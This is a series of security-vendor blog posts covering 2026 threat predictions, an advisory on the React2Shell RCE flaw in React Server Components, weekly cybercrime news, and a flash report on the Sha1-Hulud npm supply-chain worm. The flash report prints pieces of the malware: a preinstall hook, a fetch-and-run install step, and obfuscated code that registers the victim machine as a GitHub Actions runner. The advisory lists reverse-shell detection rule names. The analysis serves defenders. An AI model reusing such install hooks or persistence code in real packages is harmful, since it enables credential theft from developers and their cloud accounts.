AI is unpopular as an idea. For most consumers it means glitchy chatbots, over-eager automation at work, auto-generated spam, and marketing departments screaming about “AI-powered” everything. The underlying capabilities are real, but the experience is mostly annoyance, precarity, and a strong sense that someone else is getting rich off a thing that is happening to you, not for you.

On top of that resentment, we’ve layered a classic asset bubble. Capital has flooded into anything AI: driving valuations, headcount, and infrastructure spending far beyond what current use-cases justify. In the last year, large tech companies have fired workers while bragging about “AI efficiencies,” even when they’re mostly just undoing years of over-hiring.

The important prediction isn’t “a bubble exists”; it’s how people will react when it finally hits the wall. Within the next year we should expect a dot-com–scale drawdown in AI equity and private valuations: a broad repricing of pure-play “AI companies,” at least one of today’s marquee AI darlings valued at less than a third of its peak, and a long tail of late-stage startups ruthlessly zeroed-out. The hyperscalers will survive because AI is one line item inside a much larger machine; most everyone else will discover that they built a feature, not a business.

The crash will happen in a reality already saturated with synthetic content. In the scramble to justify their spend, organizations are using models to flood every channel with low-cost output: SEO sludge, autogenerated news, endless pitches, synthetic “user reviews,” fake engagement. Previously trusted sites and platforms are already quietly tilting from human-written to machine-written material because the unit economics are irresistible. The problem is they are using last decade’s metrics: what is the actual economic value of Daily Active Users when the content they are consuming is slop that nobody can monopolize?

As the synthetic layer of our online experience deepens, models are trained and retrained on their own exhaust and on rival models’ curated “knowledge bases”, wiki-like sites and reference corpora that are themselves partially or wholly machine-written. Systems start to treat these partisan or synthetic compilations as “ground truth” simply because they look like structured authority.

“Model poisoning” as a subset of a larger, more pernicious “reality poisoning”

The targeted threat of “model poisoning” becomes the inescapable threat of “reality poisoning” and the line between what actually happened and what the machine inferred as plausible will vanish.

This increasingly synthetic environment directly undermines the business case that justified the bubble in the first place. Search gets worse, watered down, and commoditized. Feeds become vacuum sealed bubbles where nothing breaks containment. Analytics get noisier and less reliable. Conversion rates slip as users learn to distrust what they see on screens. Enterprises that bought AI to “supercharge knowledge work” find that their internal knowledge bases are now clogged with plausible nonsense that’s harder and harder to audit. The marginal ROI on yet another AI integration rapidly decays.

So when the capital tide goes out, the public story will be simple and hostile. “AI took my job and ruined the internet.” The actual big picture may be composed of macro economics, overcapacity, and misallocated capital, but the emotional truth will be that AI made jobs less secure, the information environment less trustworthy, and the daily experience of technology spammy and brittle.

In the aftermath, the models will remain, the infrastructure will remain, and the incumbents will survive by using them where they produce actual value. What won’t survive will be broad-based cultural, political, and financial enthusiasm.

In the next year, we will end up with powerful systems embedded deep in a few dominant platforms, operating in a permanently contaminated data environment, surrounded by a public that no longer believes the marketing and cannot trust the outputs.

Dual-Use Will Eat Alignment and Turn Into Regional Censorship

AI and LLM development are on track to become core pillars of national defense. Questions about “U.S. vs. China vs. everyone else” will move out of policy think-tanks and into mainstream geopolitics. Behind closed doors, frontier systems will be evaluated less as “products” and more as strategic infrastructure: tools that can rewrite the balance of cyber offense, intelligence gathering, and information operations both at home and abroad.

In this world, statements of “public model alignment” will become less important. The loud, visible debates about fairness, bias, and “responsible AI” will continue, but the most consequential work on offensive AI capabilities will move into secure facilities, export-controlled supply chains, and gray markets. The question will shift from “Is this system aligned with human values?” to “Is this system aligned with our national interests?”

Because AI systems are inherently dual-use, offensive capabilities and control affordances will be developed in parallel. The same model that politely refuses to discuss certain topics in a consumer chat interface will have close cousins tuned for intrusion discovery, vulnerability triage, targeted influence, and automated exploitation. Many of those capabilities will originate in state-backed programs, but they won’t stay there. They’ll diffuse into law enforcement, domestic security services, and private contractors, where they will be applied to civilian populations as instruments of soft control and, when desired, hard power.

That logic will leak out into the consumer layer as regionalized safety controls. As these technologies scale, they will increasingly mirror existing patterns of information control. Providers will ship different rule-sets and behaviors by jurisdiction, the way streaming platforms already fragment their catalogs country by country. Providers will claim that this represents “localization” efforts — where differences in language and cultural references are updated for the target population. What they are really localizing is the range of thinkable thoughts within a language model.

Whatever their marketing stance on “neutrality” or aversion to particular ideological labels, major providers will have very strong incentives to align their models with local statutes, regulatory guidance, and informal political red lines. If a given government can threaten licenses, data-center permits, key executives, or revenue streams, the “alignment layer” becomes one more lever for the powerful. Governments will jump at the opportunity to tweak refusal patterns, soften the model’s treatment of this history, or remove guidance that might make protests more effective.

Over time, legislators, regulators, authoritarian regimes, and litigators will get a much sharper sense of where these levers sit inside these systems: how content filters work, what knobs exist for toxicity, radicalization, and persuasion, or how model-delivered advice translates into real-world actions. The volume and specificity of legal and policy demands on these knobs will expand accordingly.

Engineering teams at these companies will spend less time debating abstract philosophical framings and more time implementing tightly scoped, jurisdiction-specific constraints designed by lawyers and national security officials.

The result will be a stratified ecosystem:

  • Public, region-locked models that are heavily constrained will become the systems most people will interact with day to day.
  • Institutional and security-grade models, derived from the same or larger bases but deployed inside governments, defense contractors, and domestic security agencies, will be used to profile, predict and shape human behavior at scale.
  • Informal and illicit models will be leaked, stolen, or quietly licensed and recirculate similar capabilities into criminal markets and non-state actors.

In all three layers, “alignment” will be eaten by dual-use. The systems will be “aligned” to institutional goals, not to a shared, global notion of human flourishing. The public will experience this as an explosion of region-specific censorship and weirdly divergent realities between models that reflect different value systems.

In short, the coming wave of LLM censorship by major U.S. and allied companies is the civilian-facing expression of a deeper shift. Once AI is framed first as a strategic asset and only secondarily as a consumer product, dual-use incentives dominate. Alignment becomes a branch of national security and regulatory compliance, and the map of model behavior starts to trace the borders of political power rather than the contours of an egalitarian reality.
Gabriel Bernadett-Shapiro, Distinguished AI Research Scientist, SentinelLABS

 

Zero or No Trust | Interconnected Services Lead to Increasingly Devastating Intrusions

Zero Trust Architecture networks have been increasingly ubiquitous over the last five years, with the pandemic driving many organizations to rapidly adopt and implement related technologies to support the sudden uptick in remote work. Threat actors were slower to adapt through 2020-2022, as there were plenty of targets who had not jumped on the ZTA bandwagon. Early adopters targeting these environments made headlines by compromising often tech-forward organizations, a far cry from the companies typically in the news for huge ransomware attacks against legacy networks.

In 2025, there were several campaigns where actors targeted highly interconnected environments by focusing on identity providers. The ShinyHunters campaign abusing OAuth relationships in certain Salesforce user environments is a notable example: granting OAuth access to the Data Loader app enabled the attackers to access the victim environment and exfiltrate data using a Salesforce tool intended to do exactly that. Similarly, in August 2025 attackers abused the Salesloft Drift application to hijack OAuth rights to harvest cloud service and SaaS credentials from the targeted environment.

There is huge potential for actors who identify improperly configured or abandoned OAuth-enabled applications. This was demonstrated in 2024 when Midnight Blizzard struck gold by discovering a legacy application in Microsoft’s test environment that enabled high-privileged access to corporate environments. For several years, skilled cloud attackers have been working on tools that map both resources and OAuth relationships in target environments.

While gaining access to such a high value environment as a major cloud service and operating system provider may not be feasible for most actors, increases in automated scanning and data evaluation will only make finding new, well-connected targets easier.

Based on the increased prevalence of Zero Trust environments, an increased attacker focus and understanding of SaaS identity providers, and the rise in sophistication of tools used to identify relationships between identities and assets in organizations’ environments, we believe there is a significant risk for attacks that misuse the new forms of “trust” used to authenticate applications within environments.

A potential evolution we may see in 2026 is tooling that not only targets one SaaS application and its downstream connections, but likely has some degree of automation or evaluation through agentic AI analysis to continue performing more phases of intrusion based on findings from the previous phase.
Alex Delamotte, Senior Threat Researcher, SentinelLABS

 

AI-Driven Threats | Blurred Attribution and the DPRK Wildcard

The use of AI by adversaries will likely manifest in two ways outside of the ongoing discourse. The vast majority of attackers’ use of AI to date has been around driving greater efficiency and automating existing parts of their intrusion lifecycle. The intelligence assessments to date tend to skew towards technical improvements and capabilities.

If we look back on past assessments of emerging technologies — and let’s be honest, AI is without a doubt an emerging technology — two unexpected things tend to happen.

First, threat actors’ use of new technologies almost inevitably blurs existing assessment lines, typically around tradecraft and attribution. If we apply this to AI, the most likely upcoming shift will be lower-level/smaller groups gaining access to capabilities that were previously used to define government-affiliated programs. In particular, AI’s ability to provide language capabilities will bring low-level cybercriminals into the realm of government programs with full linguistic capabilities. This was an incredibly important capability distinction that is likely to end in the coming year solely because of AI.

The second likely outcome will be an almost inevitable surprise from DPRK’s AI use. DPRK cyber activities have previously caught intelligence organizations off-guard multiple times. Examples range from destructive attacks geared towards stopping a movie release to the current IT worker situation.

Additionally, AI has proven highly useful and effective to DPRK efforts; again, the IT workers are a great example. When we pair these realities with the vast amount of illicit revenue generated by DPRK’s efforts at stealing cryptocurrency, we see an interesting situation emerging.

We have a cyber effort known to produce surprises, actively leveraging AI in a large and also previously unforeseen manner, and producing large amounts of revenue for the regime through cyber actions, both cryptocurrency theft and IT worker payments.

There is a high likelihood some level of these illicit gains will be reinvested into the DPRK cyber programs to increase their scope, scale, and impact, programs that are already actively pushing the bounds of AI use. While we do not have an expected outcome specifically, the likelihood of an unexpected, large, AI-driven surprise from DPRK is something we should be mindful of and prepared to tackle on the defensive side.

Steve Stone, SVP, Threat Discovery & Response

 

Looking Ahead & Protection Now

Moving ahead demands strong, decisive leadership based on confident security choices and the courage to evolve. For all those committed to a safer and more resilient future, SentinelOne is ready to help secure every aspect of your business. Contact us to learn more about cybersecurity built for what’s next.


From React to Remote Code – Protecting Against the Critical React2Shell RCE Exposure

A critical remote code execution (RCE) vulnerability, dubbed ‘React2Shell’, affecting React Server Components (RSC) and Next.js, is allowing unauthenticated attackers to perform server-side code attacks via malicious HTTP requests.

Discovered by Lachlan Davidson, the flaw stems from insecure deserialization in the RSC ‘Flight’ protocol and impacts packages including react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack. Exploitation is highly reliable, even in default deployments, and a single request can compromise the full Node.js process. The flaw is being tracked as CVE-2025-55182. NIST subsequently rejected CVE-2025-66478, which was originally assigned for Next.js, as a duplicate of CVE-2025-55182.

This blog post includes the critical, immediate actions recommended to secure your environment, new and existing Platform Detection Rules designed to defend against this vulnerability, and information on how SentinelOne Offensive Security Engine, a core component of the Singularity™ Cloud Security solution, allows our customers to quickly identify potentially vulnerable workloads.

What is React2Shell? Background & Impact

On December 3, 2025, the React and Next.js teams disclosed two related vulnerabilities in the React Server Components (RSC) Flight protocol: CVE-2025-55182 (React) and CVE-2025-66478 (Next.js), with the latter CVE now marked by NIST as a duplicate.

Both enable unauthenticated RCE, impacting applications that use RSC directly or through popular frameworks such as Next.js. These vulnerabilities are rated critical (CVSS 10.0) because exploitation requires only a crafted HTTP request. No authentication, user action, or developer-added server code is needed for an attacker to gain control of the underlying Node.js process.

The vulnerability exists because RSC payloads are deserialized without proper validation, exposing server functions to attacker-controlled inputs. Since many modern frameworks enable RSC as part of their default build, some teams may be exposed without being aware that server-side RSC logic is active in their environment.

Security testing currently shows:

  • Exploitation can succeed with near 100% reliability
  • Default configurations are exploitable, including a standard Next.js app created with create-next-app and deployed with no code changes
  • Applications may expose RSC endpoints even without custom server functions
  • A single malicious request can escalate to full Node.js process compromise

Security researchers warn that cloud environments and server-side applications using default React or Next.js builds are particularly at risk. Exploitation could allow attackers to gain full control over servers, access sensitive data, and compromise application functionality. Reports have already emerged of China-nexus threat groups “racing to weaponize” the flaw.

Available Vendor Mitigations & Immediate Actions

Fixes are available in React 19.0, 19.1.0, 19.1.1, and 19.2.0, and Next.js 5.x, Next.js 16.x, Next.js 14.3.0-canary.77 and later canary releases. Administrators are urged to audit environments and update affected packages immediately.

Companies are advised to review deployments, restrict unnecessary server-side exposure, and monitor logs for anomalous RSC requests. Securing default configurations, validating deserialized input, and maintaining a regular patch management schedule can prevent attackers from exploiting framework-level vulnerabilities in production applications.

  1. Update React by installing the patched versions of React as listed above.
  2. Update Next.js and other RSC-enabled frameworks as listed above. Ensure the latest framework and bundler releases are installed so they ship the patched React server bundles.
  3. Review deployment behavior by checking whether your organization’s workloads expose RSC server function endpoints. These may exist regardless of whether developers added custom server functions.
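
To support the audit in steps 1 and 2, the following added example (not SentinelOne or React project code) walks a parsed npm lockfile and flags installs of the three RSC packages named above whose version falls in the affected range this post cites for CVE-2025-55182 (19.0.0 through 19.2.0). The function names, status labels and sample lockfile are assumptions constructed for illustration; prerelease and unparseable versions are reported for manual review rather than guessed at.

```javascript
// Added example: audit an npm lockfile for RSC packages in the affected range.
// Load a real file with: auditLockfile(JSON.parse(fs.readFileSync("package-lock.json", "utf8")))

const RSC_PACKAGES = new Set([
  "react-server-dom-webpack",
  "react-server-dom-parcel",
  "react-server-dom-turbopack",
]);

// Range taken from this page: "Versions 19.0.0–19.2.0".
const AFFECTED_MIN = [19, 0, 0];
const AFFECTED_MAX = [19, 2, 0];

function parseVersion(raw) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?(?:\+.*)?$/.exec(String(raw).trim());
  if (!m) return null;
  return { core: [Number(m[1]), Number(m[2]), Number(m[3])], prerelease: m[4] || null };
}

function compareCore(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

// Returns "affected", "outside-range" or "review".
function classify(rawVersion) {
  const v = parseVersion(rawVersion);
  if (!v) return "review"; // links, git URLs, workspace specifiers, missing versions
  const atOrAboveMin = compareCore(v.core, AFFECTED_MIN) >= 0;
  const atOrBelowMax = compareCore(v.core, AFFECTED_MAX) <= 0;
  // Canary/RC builds do not map cleanly onto the stable range: have a human check them.
  if (v.prerelease) return atOrAboveMin ? "review" : "outside-range";
  return atOrAboveMin && atOrBelowMax ? "affected" : "outside-range";
}

// "node_modules/a/node_modules/@scope/b" -> "@scope/b"
function packageNameFromPath(lockPath) {
  const marker = "node_modules/";
  const idx = lockPath.lastIndexOf(marker);
  return idx === -1 ? null : lockPath.slice(idx + marker.length);
}

function auditLockfile(lock) {
  const findings = [];
  const record = (name, version, where) => {
    if (!RSC_PACKAGES.has(name)) return;
    findings.push({ name, version: version ?? null, where, status: classify(version) });
  };

  // lockfileVersion 2 and 3: flat "packages" map keyed by install path,
  // which also exposes nested copies pulled in by a framework.
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    const name = packageNameFromPath(path);
    if (name) record(name, entry.version, path);
  }

  // lockfileVersion 1: nested "dependencies" tree.
  if (!lock.packages) {
    const walk = (deps, trail) => {
      for (const [name, entry] of Object.entries(deps || {})) {
        const where = trail ? `${trail} > ${name}` : name;
        record(name, entry.version, where);
        walk(entry.dependencies, where);
      }
    };
    walk(lock.dependencies, "");
  }
  return findings;
}

// Constructed sample lockfile; package paths and versions are illustrative only.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    "": { name: "constructed-app", version: "1.0.0" },
    "node_modules/react": { version: "19.1.0" },
    "node_modules/react-server-dom-webpack": { version: "19.1.0" },
    "node_modules/some-framework/node_modules/react-server-dom-turbopack": { version: "19.0.0-rc.1" },
    "node_modules/react-server-dom-parcel": { version: "19.9.9" }, // constructed, not a real release
  },
};

for (const f of auditLockfile(SAMPLE_LOCK)) {
  console.log(`${f.status.padEnd(13)} ${f.name}@${f.version}  (${f.where})`);
}
```

An empty result does not clear a Next.js deployment: as step 2 notes, frameworks ship their own React server bundles, so the framework version has to be checked as well.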

How SentinelOne Protects Our Customers

Cloud Native Security – Offensive Security Engine

SentinelOne’s Offensive Security Engine (OSE), a core component of its Singularity Cloud Security solution, proactively distinguishes between theoretical risks and actual threats by simulating an attacker’s methodology. Rather than relying solely on static scans that flag every potential misconfiguration or vulnerability, this engine automatically conducts safe, harmless simulations against your cloud infrastructure to validate exploitability.

This approach delivers differentiated outcomes by radically reducing alert fatigue and focusing security teams on immediate, confirmed dangers. By providing concrete evidence of exploitability (such as screenshots or code snippets of the successful simulation), it eliminates the need for manual validation and “red teaming” of every alert. Teams can shift from chasing hypothetical vulnerabilities to remediating verified attack vectors, ensuring resources are always deployed against the risks that pose a genuine threat to their environment.

In response to this vulnerability, SentinelOne released a new OSE plugin which can verify exploitability of these vulnerabilities for publicly accessible workloads using a defanged (i.e., harmless) HTTP payload.

Viewing Misconfigurations in the SentinelOne Console

SentinelOne customers can quickly identify potentially vulnerable workloads using the Misconfigurations page in the SentinelOne Console.

Search for:

React & Next.js (React Server Components) Versions 19.0.0–19.2.0 Vulnerable to Pre-Authentication Remote Code Execution via Unsafe Deserialization (CVE-2025-55182)

This highlights Node.js workloads that are exposing RSC-related server function endpoints. Once identified, affected assets can be patched or temporarily isolated. SentinelOne CWS also detects suspicious Node.js behaviors associated with exploitation attempts, including downloaders and reverse shells, and provides Live Security Updates to maintain protection as new detections are deployed.

It identifies verified exploitable paths on your publicly exposed assets, confirming which systems are truly at risk. By validating exploitability rather than simply flagging theoretical vulnerabilities, Singularity Cloud Security minimizes noise and provides concrete evidence so security teams can focus on what matters.

Wayfinder Threat Hunting

The Wayfinder Threat Hunting team is proactively hunting for this emerging threat by leveraging comprehensive threat intelligence. This includes, but is not limited to, indicators and tradecraft associated with known active groups such as Earth Lamia and Jackpot Panda.

Our current operational coverage includes:

  • Atomic IOC Hunting: We have updated our atomic IOC library to include known infrastructure and indicators from these threat actors, as well as broader intelligence regarding this campaign.
  • Behavioral Hunting: We are actively building and executing hunts designed to detect behavioral TTP matches that identify suspicious activity beyond static indicators.

Notification & Response: All identified true positive findings will generate alerts within the console for the affected sites. For clients with MDR, the MDR team will actively review these alerts and manage further escalation as required.

Platform Detection Rules

SentinelOne’s products provide a variety of detections for potential malicious follow-on reverse shell behaviors and other actions which may follow this exploit. As of December 5, 2025, SentinelOne released new Platform Detection Rules specifically to detect observed in-the-wild exploit activity. We recommend customers apply the latest detection rule, Potential Exploitation via Insecure Deserialization of React Server Components (RSC), urgently to ensure maximum protection.

Additionally, SentinelOne recommends customers verify the following existing rules have also been enabled:

  • Potential Reverse Shell via Shell Processes
  • Potential Reverse Shell via Node
  • Potential Reverse Shell via Python
  • Reverse Shell via Perl Utility
  • Potential Reverse Shell via AWK Utility
  • Potential Reverse Shell via GDB Utility
  • Potential Reverse Shell via Lua Utility
  • Potential Reverse Shell via Netcat
  • Potential Reverse Shell using Ruby Utility
  • Potential Reverse Shell via Socat Utility

Conclusion

CVE-2025-55182 and CVE-2025-66478 represent critical risks within the React Server Components Flight protocol. Because frameworks like Next.js enable RSC by default, many environments may be exposed even without intentional server-side configuration. Updating React, updating dependent frameworks, and verifying whether RSC endpoints exist in your organization’s workloads are essential steps.

Singularity Cloud Security helps organizations reduce risk by identifying vulnerable workloads, flagging misconfigurations, and detecting malicious Node.js behavior linked to RCE exploitation. This provides immediate visibility and defense while patches are applied.


The Good, the Bad and the Ugly in Cybersecurity – Week 49

The Good | Authorities Jail WiFi Hacker, Seize €1.3B Crypto Mixer & Charge Two Malicious Insiders

An Australian national has received just over seven years in prison for running “evil twin” WiFi networks on various flights and airports to steal travelers’ data. Using a ‘WiFi Pineapple’ device as an access point, he cloned legitimate airport SSIDs. Users were then redirected to phishing sites where he harvested their credentials, which were exploited to access women’s accounts and obtain intimate content. Investigators found thousands of images, stolen credentials, and fraudulent WiFi pages. The individual has since pleaded guilty to multiple cybercrime, theft, and evidence-destruction charges.

In Europe, Swiss and German authorities have dismantled the Cryptomixer service, which allegedly laundered over €1.3 billion in Bitcoin since 2016. As part of Operation Olympia, officials seized three servers, 12 TB of data, Tor .onion domains, and €24 million in Bitcoin, with support from Europol and Eurojust. Cryptomixer, accessible on both the clear and dark web as a hybrid mixing service, obscured blockchain transactions for ransomware operators, dark markets, and a variety of criminal groups.

U.S. prosecutors have charged Virginia twin brothers for allegedly conspiring to steal sensitive government data and destroy databases after being fired as federal contractors. Previously sentenced in 2015 for unauthorized access to State Department systems, they returned to contracting roles before facing these latest indictments for fraud, identity theft, and record destruction. The Justice Department says one brother deleted 96 government databases in February 2025, stole IRS and EEOC data, and abused AI for guidance on how to hide evidence. Both men now face lengthy federal penalties if convicted.

The Bad | Investigation Exposes Contagious Interview Remote Worker & Identity Theft Scheme

In a collaborative investigation, researchers have exposed a persistent North Korean infiltration scheme linked to Operation Contagious Interview (aka UNC5267). The researchers observed in real time adversary operators using sandboxed laptops, revealing tactics designed to embed North Korean IT workers in Western companies, especially those within STEM and finance industries.

🇰🇵 Livestreaming from a #Lazarus laptop farm.

📼 For the first time ever, we recorded DPRK’s Famous Chollima full attack cycle: interviews, internal chats, every tool they use and every single click they made. Get ready for tons of raw footage.

⬇ Full article via ANYRUN. pic.twitter.com/2fyTn3zLI6

— Mauro Eldritch 🏴‍☠️ (@MauroEldritch) December 4, 2025

The operation began when a researcher posed as a U.S. developer targeted by a Contagious Interview recruiter. The attacker attempted to hire the fake developer, requesting full access to their SSN, ID, Gmail, LinkedIn, and 24/7 laptop availability. Virtual machines mimicking real developer laptops were deployed, allowing the researchers to monitor every action without alerting the operators.

The sandbox sessions showed a lightweight but effective toolkit focused on identity theft and remote access rather than malware deployment. Operators were also seen using AI-driven job tools to auto-fill applications and generate interview answers, browser-based OTP generators to bypass MFA, and Google Remote Desktop for persistent control. Reconnaissance commands validated the environment, while connections routed through Astrill VPN matched known Contagious Interview infrastructure. In one session, an operator explicitly requested ID, SSN, and banking details, confirming the goal of full identity and workstation takeover.

The investigation highlights remote hiring as a quiet yet reliable entry point for identity-based attacks. Once inside, attackers can access sensitive dashboards, critical business data, and manager-level accounts. Companies can reduce risk by raising internal awareness and providing safe channels for employees to report suspicious requests, helping prevent infiltration before it escalates into internal compromise.

The Ugly | Researchers Warn of Critical React2Shell RCE Vulnerability in React and Next.js

A critical remote code execution (RCE) vulnerability, dubbed ‘React2Shell’, affecting React Server Components (RSC) and Next.js, allows unauthenticated attackers to execute server-side code via malicious HTTP requests.

Discovered by Lachlan Davidson, the flaw stems from insecure deserialization in the RSC ‘Flight’ protocol and impacts packages including react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack. Versions affected include React 19.0 to 19.2.0 and Next.js experimental canary releases 14.3.0 to 16.x below patched versions. Exploitation is highly reliable, even in default deployments, and a single request can compromise the full Node.js process.

The flaw is being tracked as CVE-2025-55182. The technically correct CVE-2025-66478 has now been marked as a duplicate.

The vulnerability exists because RSC payloads are deserialized without proper validation, exposing server functions to attacker-controlled inputs. Modern frameworks often enable RSC by default, leaving developers unknowingly exposed. Fixes are available in React 19.0, 19.1.0, 19.1.1, and 19.2.0, and Next.js 15.0.5–16.0.7. Administrators are urged to audit environments and update affected packages immediately.

Security researchers warn that cloud environments and server-side applications using default React or Next.js builds are particularly at risk. Exploitation could allow attackers to gain full control over servers, access sensitive data, and compromise application functionality. Reports have already emerged of China-nexus threat groups “racing to weaponize” the flaw.

China-nexus cyber threat groups rapidly exploit React2Shell vulnerability (CVE-2025-55182)
December 4, 2025, Amazon Web Services
aws.amazon.com/blogs/securi…
@awscloud.bsky.social

— 780th Military Intelligence Brigade (Cyber) (@780thmibdecyber.bsky.social) 5 December 2025 at 11:32

Companies are advised to review deployments, restrict unnecessary server-side exposure, and monitor logs for anomalous RSC requests. Securing default configurations, validating deserialized input, and maintaining a regular patch management schedule can prevent attackers from exploiting framework-level vulnerabilities in production applications. SentinelOne’s blog post on the React2Shell RCE flaw can be found here.

The Good, the Bad and the Ugly in Cybersecurity – Week 48

The Good | Poland Detains Russian Hacker Amid Rising Moscow-Linked Sabotage

Poland’s Central Bureau for Combating Cybercrime (CBZC) has arrested a Russian national in Kraków on suspicion of breaching the IT systems of local companies, marking the latest incident tied to what Warsaw describes as Russia’s expanding sabotage and espionage campaign across Europe. According to Polish Interior Minister Marcin Kierwiński, the suspect allegedly compromised corporate-level security defenses to access and manipulate company databases in ways that could have disrupted operations and endangered customers.

Source: RMF24

Investigators say the man illegally entered Poland in 2022 and later obtained refugee status. He was detained on November 16 by Polish authorities and has since been interrogated, charged, and placed in three months of pre-trial custody. Authorities also believe he may be connected to additional cyberattacks affecting firms in Poland and other EU states, and they are still determining the full scope of the damage.

The arrest comes amid heightened concern over Russian hybrid warfare since Moscow’s invasion of Ukraine in 2022. Poland has linked recent incidents, including sabotage of a railway line and a fire at a major shopping mall, to Russian intelligence activities. The country has shut down all Russian consulates following the events.

EU officials warn that cyberattacks against regional companies and institutions have surged, with many attributed to GRU-backed actors. Other recent disruptions have included payment service outages and leaks of customer data from Polish firms. In response, Polish Digital Affairs Minister Krzysztof Gawkowski plans to invest a record €930 million in bolstering the country’s cybersecurity, underscoring what authorities describe as the urgent need for stronger corporate defenses and deeper international cooperation against increasingly aggressive cyber threats.

The Bad | FBI Warns of Banking Fraud & Account Takeover Schemes Ahead of Holidays

The FBI has issued a PSA about a sharp rise in account takeover (ATO) fraud, with cybercriminals impersonating financial institutions to steal more than $262 million since January 2025. The agency’s Internet Crime Complaint Center (IC3) has received over 5,100 reports this year from victims including individuals, businesses, and organizations across every sector.

The schemes start off with deceiving victims through texts, calls, and emails, posing as bank staff or customer support. They trick targets into revealing their login credentials, multi-factor authentication (MFA) codes, or one-time passcodes (OTPs). Criminals have also been luring victims onto phishing websites engineered to mimic legitimate banking or payroll sites, sometimes boosted through SEO poisoning to appear at the top of search results.

Once inside the victim’s account, fraudsters reset passwords, lock out the rightful owners, and quickly transfer funds into crypto-linked accounts, which makes recovery extremely difficult. Some victims report being manipulated with fabricated claims of fraudulent purchases, or even firearm transactions to incite panic, before being redirected to a second scammer impersonating law enforcement.

As we enter the holiday season, the FBI urges consumers and organizations to monitor their accounts closely, use strong unique passwords, enable MFA, verify URLs, and avoid visiting personal banking sites through search engine results. Victims should immediately contact their financial institutions to request recalls and provide indemnification documents, and then file detailed reports with IC3.

Officials and security experts stress that most ATO cases stem from compromised credentials. Stronger identity verification, such as passwordless authentication and manual verification steps, remains basic security hygiene necessary for reducing these types of attacks.

The Ugly | OpenAI Alerts API Users After Mixpanel Breach Exposes Limited Data

OpenAI is alerting some ChatGPT API customers that limited personally identifiable information (PII) was exposed after its third-party analytics provider, Mixpanel, was breached. The compromise, stemming from a smishing campaign detected on November 8, affected “limited analytics data related to some users of the API”, but did not compromise ChatGPT or other OpenAI products.

While OpenAI confirmed that sensitive information such as credentials, API keys, requests and usage data, payment and chat details, and government IDs remained secure, the exposed data may include usernames, email addresses, approximate user location, browser and operating system details, referring websites, and account or organization IDs.

OpenAI said users do not need to reset passwords or regenerate API keys. Some users have reported that CoinTracker, a cryptocurrency tracking platform, may also have been affected, with limited device metadata and transaction counts exposed.

Has @mixpanel not disclosed this breach? Sent from @CoinTracker. pic.twitter.com/xk9nmGVmfm

— Daniel Harrison (@danielh9277) November 27, 2025

OpenAI has begun an investigation, removed Mixpanel from production services, and is notifying affected users directly. The company warns that the leaked data could be used for phishing or social engineering attacks and advises users to verify any messages claiming to relate to the incident, enable MFA, and never share account credentials via email, text, or chat.

Mixpanel, in turn, has responded to the incident by securing accounts, revoking active sessions, rotating compromised credentials, blocking the threat actor’s IPs, resetting employee passwords, and implementing new controls to prevent future incidents. The analytics firm also reached out to all impacted customers directly.

The incident highlights the risks posed by third-party service providers and the importance of awareness against phishing, even when no core systems or highly sensitive information are directly compromised.

Defending Against Sha1-Hulud: The Second Coming

Shai-Hulud Worm 2.0 is a major escalation of the NPM supply chain attack, now executing in the preinstall phase to harvest credentials across AWS, Azure, and GCP and establish persistence via GitHub Actions.

The following SentinelOne Flash Report was sent to all SentinelOne customers and partners on Tuesday, November 25, 2025. It includes an in-depth analysis of the new variant’s tactics, our real-time detection posture, and the critical, immediate actions required to secure your environment.


Sha1-Hulud: The Second Coming

Document Type: Wayfinder Flash Report
TLP: Green
Date of Publication: 25 November 2025
Cyber Risk Rating: High
Date of Research: 24 November 2025
Referenced Threat Activity: Supply chain attacks

Key Takeaways

  • A new wave of compromised NPM packages is leading to wide-scale supply chain attacks.
  • This attack shows additional capabilities compared to previous attacks.
  • Victims should immediately change their tokens and secrets, including those associated with any affected cloud environment.

Technical Details

Overview

“Sha1-Hulud” is the name of an ongoing NPM supply chain attack which started as early as November 21, 2025, according to public information. The new attack is similar to the previous “Shai-Hulud”, but includes additional features and is triggered by different compromised packages. The name of the new attack comes from the malware author’s description inside the GitHub repository with the exfiltrated data:

Fig. 1: Public GitHub repo with exfiltrated data from “Sha1-Hulud” victim

While the attacks share similarities, the new attack is slightly different from the previous one and it is not yet known if both attacks come from the same threat actor.

The current attacks have impacted several popular packages such as:

A comprehensive list of affected packages can be found here.

Execution & Persistence

Unlike the previous attack, which used “postinstall” to trigger the malware execution, the “Sha1-Hulud” attack utilizes “preinstall” to execute the malware:

    {
      ...
      "scripts": {
        "preinstall": "node setup_bun.js"
      }
      ...
    }

The malware downloads the legitimate “bun” tool to orchestrate the current attack:

    async function downloadAndSetupBun() {
      try {
        let command;
        if (process.platform === 'win32') {
          // Windows: Use PowerShell script
          command = 'powershell -c "irm bun.sh/install.ps1|iex"';
        } else {
          // Linux/macOS: Use curl + bash script
          command = 'curl -fsSL https://bun.sh/install | bash';
        }
        …
        const environmentScript = path.join(__dirname, 'bun_environment.js');
        if (fs.existsSync(environmentScript)) {
          runExecutable(bunExecutable, [environmentScript]);
        } else {
          process.exit(0);
        }

The file “bun_environment.js” is an obfuscated JavaScript malware being added to the compromised packages in the “Sha1-Hulud” attack.

This script creates additional files such as “cloud.json”, “contents.json”, “environment.json”, and “truffleSecrets.json” for exfiltration and “discussion.yaml” for persistence.

The payload then registers the infected machine as a self-hosted runner named “SHA1HULUD”:

    let _0x449178 = await this.octokit.request("POST /repos/{owner}/{repo}/actions/runners/registration-token", {
      'owner': _0x349291,
      'repo': _0x2b1a39
    });
    if (_0x449178.status == 0xc9) {
      let _0x1489ec = _0x449178.data.token;
      if (a0_0x5a88b3.platform() === 'linux') {
        await Bun.$`mkdir -p $HOME/.dev-env/`;
        await Bun.$`curl -o actions-runner-linux-x64-2.330.0.tar.gz -L https://github.com/actions/runner/releases/download/v2.330.0/actions-runner-linux-x64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + "/.dev-env").quiet();
        await Bun.$`tar xzf ./actions-runner-linux-x64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + "/.dev-env");
